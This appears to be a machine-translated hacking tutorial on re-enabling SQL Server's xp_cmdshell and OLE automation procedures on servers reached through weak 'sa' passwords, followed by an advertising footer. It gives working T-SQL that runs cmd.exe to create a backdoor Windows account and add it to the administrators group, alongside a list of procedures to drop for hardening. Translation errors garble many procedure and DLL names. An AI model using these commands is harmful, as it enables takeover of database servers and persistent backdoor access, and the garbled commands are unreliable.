How to enable 'openrowset' in sql2005:
Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'ad hoc distributed queries ', 1; reconfigure;
How to enable 'SP _ oacreate' in sql2005:
Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'ole automation procedures ', 1; reconfigure;
Overcome SA's various difficulties
Restore the execution of xp_mongoshell in common cases
1. The Stored Procedure 'master... xpcmdshell' cannot be found '.
Recovery Method: After querying the separator connection,
Step 1: Execute exec sp_addextendedproc xp_cmdshell, @ dllname = 'xplog70. dll 'declare @ o int
Step 2: Execute sp_addextendedproc 'xp _ cmdshell', 'sql70. dll'
Then press F5 to complete the command execution.
2. Unable to load DLL xpsql70.dll or a DLL referenced by the DLL. Cause 126 (the specified module cannot be found .)
Recovery Method: After querying the separator connection,
Step 1: Execute sp_dropextendedproc "xp_cmdshell"
Step 2: Execute sp_addextendedproc 'xp _ cmdshell', 'sql70. dll'
Then press F5 to complete the command execution.
3. The xp_cmdshell function cannot be found in xpweb70.dll. Cause: 127 (the specified Program .)
Recovery Method: After querying the separator connection,
Step 1: Execute exec sp_dropextendedproc 'xp _ export shell'
Step 2: Execute exec sp_addextendedproc 'xp _ cmdshell', 'xpweb70. dll'
Then press F5 to complete the command execution.
Iv. Ultimate Method.
If none of the above methods can be recovered, try the following method to add an account:
After querying the separator connection,
2000servser system:
Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/C net user Dell huxifeng007/add'
Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/C net localgroup administrators Dell/add'
XP or 2003server system:
Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C net user Dell huxifeng007/add'
Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C net localgroup administrators Dell/add'
--------------
Xp_mongoshell's new Recovery Method
Delete
Drop procedure sp_addextendedproc
Drop procedure sp_oacreate
Exec sp_dropextendedproc 'xp _ export shell'
Restore
DBCC addextendedproc ("sp_oacreate", "odsole70.dll ")
DBCC addextendedproc ("xp_mongoshell", "xplog70.dll ")
In this way, the data can be directly restored without worrying about the existence of sp_addextendedproc.
-----------------------------
Delete the xp_mongoshell statement in the extended stored procedure:
Exec sp_dropextendedproc 'xp _ export shell'
Restore shell SQL statements
Exec sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll'
Enable the SQL statement of Shell
Exec sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll'
Determine whether the storage extension exists
Select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ cmdshell'
If the returned result is 1, OK is returned.
Restore xp_mongoshell
Exec master. DBO. addextendedproc 'xp _ Your shell', 'xp log70. dll '; select count (*) from master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell'
If the returned result is 1, OK is returned.
Otherwise, upload xplog7.0.dll.
Exec master. DBO. addextendedproc 'xp _ mongoshell', 'c: \ winnt \ system32 \ xplog70.dll'
Block SQL statements of Shell
Sp_dropextendedproc "xp_cmdshell
----------------
Delete dangerous SQL storage: CopyCode The Code is as follows: Drop procedure sp_makewebtask
Exec master .. sp_dropextendedproc xp_cmdshell
Exec master .. sp_dropextendedproc xp_dirtree
Exec master .. sp_dropextendedproc xp_fileexist
Exec master .. sp_dropextendedproc xp_terminate_process
Exec master .. sp_dropextendedproc sp_oamethod
Exec master .. sp_dropextendedproc sp_oacreate
Exec master .. sp_dropextendedproc xp_regaddmultistring
Exec master .. sp_dropextendedproc xp_regdeletekey
Exec master .. sp_dropextendedproc xp_regdeletevalue
Exec master .. sp_dropextendedproc xp_regenumkeys
Exec master .. sp_dropextendedproc xp_regenumvalues
Exec master .. sp_dropextendedproc sp_add_job
Exec master .. sp_dropextendedproc sp_addtask
Exec master .. sp_dropextendedproc xp_regread
Exec master .. sp_dropextendedproc xp_regwrite
Exec master .. sp_dropextendedproc xp_readwebtask
Exec master .. sp_dropextendedproc xp_makewebtask
Exec master .. sp_dropextendedproc xp_regremovemultistring
Exec master .. sp_dropextendedproc sp_oacreate
Drop procedure sp_addextendedproc
/* Restore the extended storage process
Restore sp_addextendedproc first. The statement is as follows:
SQL code:Copy codeThe Code is as follows: Create procedure sp_addextendedproc --- 1996/08/30 20:13
@ Functname nvarchar (517),/* (owner.) Name of function to call */@ dllname varchar (255)/* Name of DLL containing function */
Set implicit_transactions off
If @ trancount> 0
Begin
Raiserror (15002,-1,-1, 'SP _ addextendedproc ')
Return (1)
End
DBCC addextendedproc (@ functname, @ dllname)
Return (0) -- sp_addextendedproc
Go
Restore all the above Extended Stored Procedures
SQL code: Copy code The Code is as follows: use master
Exec sp_addextendedproc xp_cmdshell, 'xp _ cmdshell. dll'
Exec sp_addextendedproc xp_dirtree, 'xpstar. dll'
Exec sp_addextendedproc xp_enumgroups, 'xp log70. dll'
Exec sp_addextendedproc xp_fixeddrives, 'xpstar. dll'
Exec sp_addextendedproc xp_loginconfig, 'xplog70. dll'
Exec sp_addextendedproc xp_enumerrorlogs, 'xpstar. dll'
Exec sp_addextendedproc xp_getfiledetails, 'xpstar. dll'
Exec sp_addextendedproc sp_oacreate, 'odsole70. dll'
Exec sp_addextendedproc sp_oadestroy, 'odsole70. dll'
Exec sp_addextendedproc sp_oageterrorinfo, 'odsole70. dll'
Exec sp_addextendedproc sp_oagetproperty, 'odsole70. dll'
Exec sp_addextendedproc sp_oamethod, 'odsole70. dll'
Exec sp_addextendedproc sp_oasetproperty, 'odsole70. dll'
Exec sp_addextendedproc sp_oastop, 'odsole70. dll'
Exec sp_addextendedproc xp_regaddmultistring, 'xpstar. dll'
Exec sp_addextendedproc xp_regdeletekey, 'xpstar. dll'
Exec sp_addextendedproc xp_regdeletevalue, 'xpstar. dll'
Exec sp_addextendedproc xp_regenumvalues, 'xpstar. dll'
Exec sp_addextendedproc xp_regread, 'xpstar. dll'
Exec sp_addextendedproc xp_regremovemultistring, 'xpstar. dll'
Exec sp_addextendedproc xp_regwrite, 'xpstar. dll'
Exec sp_addextendedproc xp_availablemedia, 'xpstar. dll'
SQL Server blocks access to 'sys. xp_expose shell' IN THE 'xp _ external shell' process, because this component has been disabled as part of the server's security configuration. The system administrator can enable 'xp _ javasshell' by using sp_configure '. For more information about enabling 'xp _ external shell', see "peripheral application configurator" in SQL Server books online ".
friends who often scan weak SQL passwords should have encountered this problem!
next, use an SQL statement.
the statement executed by the analyzer:
exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp _ Your shell', 1; reconfigure
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
